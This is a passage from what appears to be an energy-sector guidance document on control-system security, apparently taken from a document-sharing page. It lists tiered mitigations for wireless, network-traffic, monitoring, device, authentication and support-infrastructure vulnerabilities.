Utilize media access control (MAC) address restrictions.
Perform wireless signal detection survey to identify the boundaries
of wireless perimeter.
Use directional antenna design when possible.
Implement technology to discover rogue wireless access points
and devices for all wireless network types.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 5 Mitigations
Use of inadequately secured wireless communication for
control
Advanced
For 802.11: Implement wireless fidelity protected access
(WPA2) encryption with a RADIUS server.
Implement 802.1x device registration along with unregistered
device detection.
Encrypt network traffic over wireless networks at the
transport or application layer (e.g., TLS, IPSEC).
Conduct RF mapping of wireless environment (e.g.,
characterize directional antenna side lobes)..
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 6 Mitigations
Use of a non-dedicated communications channel for command
and control and/or inappropriate use of control system
network bandwidth for non-control purposes
Foundational
Develop and implement a policy that addresses
applications and protocols introduced to a control system.
Minimizing non-control system traffic reduces noise,
enhancing effectiveness of security measures.
Restrict or eliminate non-critical traffic on the control
network and ensure quality of service for all control system
traffic.
Segregate functionality onto separate networks (e.g., do not
combine e-mail with control system networks).
Intermediate
Implement strong procedural or technical controls at all
access points to the control system to ensure authenticity of
the accessing party, where technically feasible.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 6 Mitigations
Use of a non-dedicated communications channel for command
and control and/or inappropriate use of control system
network bandwidth for non-control purposes
Intermediate - continued
Implement intrusion detection to monitor traffic. Evaluate
network traffic and control system point counts and polling
rates. Reconfigure for optimal use of existing resources..
Advanced
Implement protocol anomaly systems to enforce legitimate
traffic
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 7 Mitigations
Insufficient application of tools to detect and report on
anomalous or inappropriate activity
Foundational
Develop and implement network and system management
capability to monitor network traffic.
Regularly audit system logs, where available.
Characterize normal traffic patterns.
Timestamp system logs for event correlation.
Preserve system logs for subsequent analysis.
Intermediate
Install anomaly detection where available.
Implement technologies to enforce legitimate traffic.
Time-synchronize system logs and sequence-of-events
recorders with GPS clocks or network time protocol (NTP).
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 7 Mitigations
Insufficient application of tools to detect and report on
anomalous or inappropriate activity
Advance
Implement tamper-resistant or tamper-proof long term
storage for all forensic data.
Introduce control system protocol signatures when they
become available.
Work with vendors to develop tools to identify inappropriate
control systems traffic.
Implement technology to conduct automatic correlation of
system logs for anomalous events.
When practical, implement self-healing systems (e.g.,
protected operating systems).
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 7 Mitigations
Insufficient application of tools to detect and report on
anomalous or inappropriate activity
Cautionary notes:
The use of active response intrusion prevention systems
should be carefully considered. The technology should be
engineered for application in a control system environment
where failsafe modes have been adequately considered for
safety and operational considerations
Intrusion detection will not encompass all vulnerabilities.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 8 Mitigations
Unauthorized or inappropriate applications or devices on
control system networks
Foundational
Develop policy that will provide guidance for allowable
applications and devices within the control system
environment.
Develop policy and procedures for change management.
Develop and implement a hardware inventory tracking
process.
Ensure sufficient security awareness training of
personnel responsible for component configuration and
maintenance.
Establish policy and procedures to implement strong
procedural or technical controls at the access points into the
control system for all devices to ensure authenticity of the
accessing party, where technically feasible.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 8 Mitigations
Unauthorized or inappropriate applications or devices on
control system networks
Foundational
Limit physical and electronic access to devices based
upon organizational roles.
Beware of automatic software shutdown mechanisms in
critical systems (e.g., processes that enforce software
licenses).
Intermediate
Use intrusion detection to uncover inappropriate
applications or devices.
Implement malware detection.
Develop and implement a policy regarding the use of
removable media.
Disable all unnecessary input/output ports on all devices.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 8 Mitigations
Unauthorized or inappropriate applications or devices on
control system networks
Advanced
Develop application baseline profile for each workstation
and server on control network. Configure intrusion detection
filters to identify and log baseline violations.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 9 Mitigations
Control systems command and control data not authenticated
Foundational
Limit connections and isolate control systems
communications and networking infrastructure.
Determine data authentication and integrity requirements. .
Intermediate
Develop and implement, where possible, key management
policies and systems based on an agreed set of standards,
procedures, and secure methods for all issues (e.g., usage,
storage, revocation, logging, auditing, etc.) associated with
use of keys.
Advanced
Use control system protocols that contain appropriate
authentication and integrity attributes without affecting
performance as the technology becomes available..
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 10 Mitigations
Inadequately managed, designed, or implemented critical
support infrastructure
Foundational
Evaluate critical support infrastructures currently in place
to determine adequacy and identify gaps.
Include critical support infrastructure functionality in
continuity of operation planning. Periodically exercise and
test recovery plans.
Adhere to regular maintenance and test procedures for
critical support infrastructure systems.
Intermediate
Establish and implement policies and procedures to
comprehensively test critical support infrastructures, and
periodically exercise test plan. Develop process for
identifying and resolving gaps that are revealed through
testing.
NSTB Enhancing Control Systems Security in the Energy Sector
Vulnerability 10 Mitigations
Inadequately managed, designed, or implemented critical
support infrastructure
Advanced
Implement mitigations to address gaps as indicated by
analysis, audits, or testing to achieve acceptable levels of
reliability/redundancy.
Identify and test interdependencies between key systems
and subsystems.
You might also like
- Module 1 The Role of Machine Learning in Cyber SecurityNo ratings yetModule 1 The Role of Machine Learning in Cyber Security38 pages
- Windows Server 2003 AD & Network DesignNo ratings yetWindows Server 2003 AD & Network Design16 pages
- WindEurope Response NIS2 Directive EC ProposalNo ratings yetWindEurope Response NIS2 Directive EC Proposal2 pages
- SCADA Testbed For Vulnerability Assessments, Penetration Testing and Incident ForensicsNo ratings yetSCADA Testbed For Vulnerability Assessments, Penetration Testing and Incident Forensics6 pages
- Whitepaper IEC 622443 Cybersecurity 1713096742No ratings yetWhitepaper IEC 622443 Cybersecurity 171309674220 pages
- Cyber Threat Intelligence CERT-EU VisionNo ratings yetCyber Threat Intelligence CERT-EU Vision22 pages
- NERC LSE Standards Applicability Matrix Posted 02 10 2009No ratings yetNERC LSE Standards Applicability Matrix Posted 02 10 200915 pages
- E-Brochure Schneider Electric's Cybersecurity ServicesNo ratings yetE-Brochure Schneider Electric's Cybersecurity Services8 pages
- Communication Between S7-1200 Plcs and Wincc V7.4 Sp1 Via Telecontrol Server Basic V3.1No ratings yetCommunication Between S7-1200 Plcs and Wincc V7.4 Sp1 Via Telecontrol Server Basic V3.164 pages
- BRKSEC-2028 Deploying Next Generation Firewall With ASA and Firepower Services PDFNo ratings yetBRKSEC-2028 Deploying Next Generation Firewall With ASA and Firepower Services PDF73 pages
- Snort IDS - IPS + Rule Writing Course Description100% (1)Snort IDS - IPS + Rule Writing Course Description2 pages
- SCADA System Security, Complexity, and Security ProofNo ratings yetSCADA System Security, Complexity, and Security Proof6 pages
- Vmware Vsphere Version Comparison: Across VersionsNo ratings yetVmware Vsphere Version Comparison: Across Versions7 pages
- (Ebook) Industrial Network Security: Securing Critical Infrastructure Networks For Smart Grid, SCADA, and Other Industrial Control Systems by Eric D. Knapp ISBN 9781597496452, 1597496456 PDF AvailableNo ratings yet(Ebook) Industrial Network Security: Securing Critical Infrastructure Networks For Smart Grid, SCADA, and Other Industrial Control Systems by Eric D. Knapp ISBN 9781597496452, 1597496456 PDF Available77 pages
- Nozomi Networks OT IoT Security Report 2021 2HNo ratings yetNozomi Networks OT IoT Security Report 2021 2H38 pages
- Differentiation ISO 27001 IEC 62443 PDFNo ratings yetDifferentiation ISO 27001 IEC 62443 PDF36 pages
- Incident Handling During Attack On Critical Information Infrastructure Handbook PDFNo ratings yetIncident Handling During Attack On Critical Information Infrastructure Handbook PDF20 pages
- Iot Network Architecture and Design: Mms Institut Teknologi DelNo ratings yetIot Network Architecture and Design: Mms Institut Teknologi Del19 pages
- WP A Solution Guide To Operational Technology CybersecurityNo ratings yetWP A Solution Guide To Operational Technology Cybersecurity40 pages
- Information Security Strategy and ArchitectureNo ratings yetInformation Security Strategy and Architecture20 pages
- Offensive IoT Exploitation - SecurityTubeNo ratings yetOffensive IoT Exploitation - SecurityTube310 pages
- Using Open Source Intelligence To Improve ICS & SCADA Security100% (2)Using Open Source Intelligence To Improve ICS & SCADA Security30 pages
- Splunk Compliance Essentials & PCI (Sept 5)No ratings yetSplunk Compliance Essentials & PCI (Sept 5)19 pages
- Nozomi Networks Guardian Specifications SheetNo ratings yetNozomi Networks Guardian Specifications Sheet6 pages
- Industrial - Cybersecurity - Risks - Oil - Gas - Operations - 1692140874 2023-08-17 12 - 49 - 47No ratings yetIndustrial - Cybersecurity - Risks - Oil - Gas - Operations - 1692140874 2023-08-17 12 - 49 - 478 pages
- Cyber Security of The Electric Power GridNo ratings yetCyber Security of The Electric Power Grid18 pages
- Process Protection: Product Overview Acoustic and Motion Sensing Acoustic Sensor For Pump MonitoringNo ratings yetProcess Protection: Product Overview Acoustic and Motion Sensing Acoustic Sensor For Pump Monitoring26 pages
- Sitrans I Supply Units and Input IsolatorsNo ratings yetSitrans I Supply Units and Input Isolators10 pages
- PAC - Catalog - All-20120720 Vol. PAC 2.0.00 PDFNo ratings yetPAC - Catalog - All-20120720 Vol. PAC 2.0.00 PDF216 pages
- 2 1kali Linux A Hands On Introduction For CybersecurityNo ratings yet2 1kali Linux A Hands On Introduction For Cybersecurity15 pages
- The Ultimate Penetration Testing Methodology (2025 Edition) - VeryLazyTechNo ratings yetThe Ultimate Penetration Testing Methodology (2025 Edition) - VeryLazyTech8 pages
- Lab 5 Identifiying Threats Vulnerabilities and ExploitsNo ratings yetLab 5 Identifiying Threats Vulnerabilities and Exploits5 pages
- Network Vulnerability Assessment and PentestingNo ratings yetNetwork Vulnerability Assessment and Pentesting9 pages
- Day 11,12,13 Notes of 75 Days Ethical Hacking Course by CybersecurityghostNo ratings yetDay 11,12,13 Notes of 75 Days Ethical Hacking Course by Cybersecurityghost11 pages
- HE182570 NguyenDucAnh Lab05 Identifiying Threats Vulnerabilities and ExploitsNo ratings yetHE182570 NguyenDucAnh Lab05 Identifiying Threats Vulnerabilities and Exploits7 pages
- How To Perform A Vulnerability AssessmentNo ratings yetHow To Perform A Vulnerability Assessment14 pages
- Experiment - 1: #1: Scan A Single Host or An Ip Address (Ipv4)No ratings yetExperiment - 1: #1: Scan A Single Host or An Ip Address (Ipv4)17 pages
